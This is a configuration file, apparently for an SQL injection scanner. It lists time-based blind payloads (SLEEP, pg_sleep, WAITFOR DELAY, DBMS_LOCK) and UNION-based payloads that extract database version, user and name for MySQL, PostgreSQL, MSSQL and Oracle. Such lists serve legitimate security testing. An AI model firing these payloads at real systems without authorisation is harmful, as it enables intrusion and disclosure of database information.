[DEFAULT]
payload = None
delimiter = None
language = ""

# ==== Delay Payloads: GIỮ NGUYÊN ====
[delay_mysql_sleep_single_quote]
payload = ' OR SLEEP(5) --
delimiter = '
language = mysql

[delay_mysql_sleep_double_quote]
payload = " OR SLEEP(5) --
delimiter = "
language = mysql

[delay_mysql_sleep_comment]
payload = ' OR 1=1 /* SLEEP(5) */ --
delimiter = '
language = mysql

[delay_postgres_pg_sleep_semicolon]
payload = '; SELECT pg_sleep(5); --
delimiter = ;
language = postgres

[delay_postgres_pg_sleep_single_quote]
payload = ' OR pg_sleep(5) --
delimiter = '
language = postgres

[delay_mssql_waitfor_delay_single_quote]
payload = ' WAITFOR DELAY ''0:0:5'' --
delimiter = '
language = mssql

[delay_mssql_if_condition_true]
payload = ' IF (1=1) WAITFOR DELAY ''0:0:5'' --
delimiter = '
language = mssql

[delay_oracle_dbms_pipe_receive]
payload = ' OR 1=DBMS_PIPE.RECEIVE_MESSAGE(''a'',5) --
delimiter = '
language = oracle

[delay_oracle_dbms_lock_sleep]
payload = ' OR 1=1 AND DBMS_LOCK.SLEEP(5) --
delimiter = '
language = oracle

[delay_mysql_numeric_sleep]
payload = 1 AND SLEEP(5) --
delimiter =
language = mysql

[delay_mysql_numeric_if_sleep]
payload = IF(1=1,SLEEP(5),0) --
delimiter =
language = mysql

[delay_postgres_numeric_pg_sleep]
payload = 1 AND pg_sleep(5) --
delimiter =
language = postgres

[delay_postgres_numeric_select_sleep]
payload = 1; SELECT pg_sleep(5) --
delimiter = ;
language = postgres

[delay_mssql_numeric_waitfor]
payload = 1; WAITFOR DELAY '0:0:5' --
delimiter = ;
language = mssql

[delay_mssql_numeric_if_waitfor]
payload = 1; IF (1=1) WAITFOR DELAY '0:0:5' --
delimiter = ;
language = mssql

[delay_oracle_numeric_dbms_lock]
payload = 1 AND DBMS_LOCK.SLEEP(5) --
delimiter =
language = oracle

[delay_oracle_numeric_dbms_pipe]
payload = 1 AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) = 0 --
delimiter =
language = oracle

# ==== Informational Payloads (modified) ====

[mysql_basic_true_single_quote]
payload = ' UNION SELECT @@version --
delimiter = '
language = mysql

[mysql_basic_true_double_quote]
payload = " UNION SELECT @@version --
delimiter = "
language = mysql

[mysql_union_select_single_quote]
payload = ' UNION SELECT @@version, USER() --
delimiter = '
language = mysql

[mysql_union_select_comment]
payload = ' UNION SELECT @@version, DATABASE() /* comment */ --
delimiter = '
language = mysql

[postgres_basic_true_single_quote]
payload = ' UNION SELECT version() --
delimiter = '
language = postgres

[postgres_union_select]
payload = ' UNION SELECT version(), current_database() --
delimiter = '
language = postgres

[postgres_using_version_function]
payload = ' UNION SELECT version(), current_user --
delimiter = '
language = postgres

[mssql_basic_true_single_quote]
payload = ' UNION SELECT @@version --
delimiter = '
language = mssql

[mssql_union_select]
payload = ' UNION SELECT @@version, DB_NAME() --
delimiter = '
language = mssql

[mssql_using_db_name]
payload = ' UNION SELECT DB_NAME(), SYSTEM_USER --
delimiter = '
language = mssql

[oracle_basic_true_single_quote]
payload = ' UNION SELECT banner FROM v$version WHERE ROWNUM = 1 --
delimiter = '
language = oracle

[oracle_union_select_dual]
payload = ' UNION SELECT banner, NULL FROM v$version WHERE ROWNUM = 1 --
delimiter = '
language = oracle

[oracle_using_user_function]
payload = ' UNION SELECT USER, NULL FROM DUAL --
delimiter = '
language = oracle

[oracle_numeric_basic_true]
payload = 1 UNION SELECT banner FROM v$version WHERE ROWNUM = 1 --
delimiter =
language = oracle

[oracle_numeric_union_select]
payload = 1 UNION SELECT banner, USER FROM v$version WHERE ROWNUM = 1 --
delimiter =
language = oracle

[mssql_numeric_basic_true]
payload = 1 UNION SELECT @@version --
delimiter =
language = mssql

[mssql_numeric_union_select]
payload = 1 UNION SELECT @@version, SYSTEM_USER --
delimiter =
language = mssql

[postgres_numeric_basic_true]
payload = 1 UNION SELECT version() --
delimiter =
language = postgres

[postgres_numeric_union_select]
payload = 1 UNION SELECT version(), current_database() --
delimiter =
language = postgres
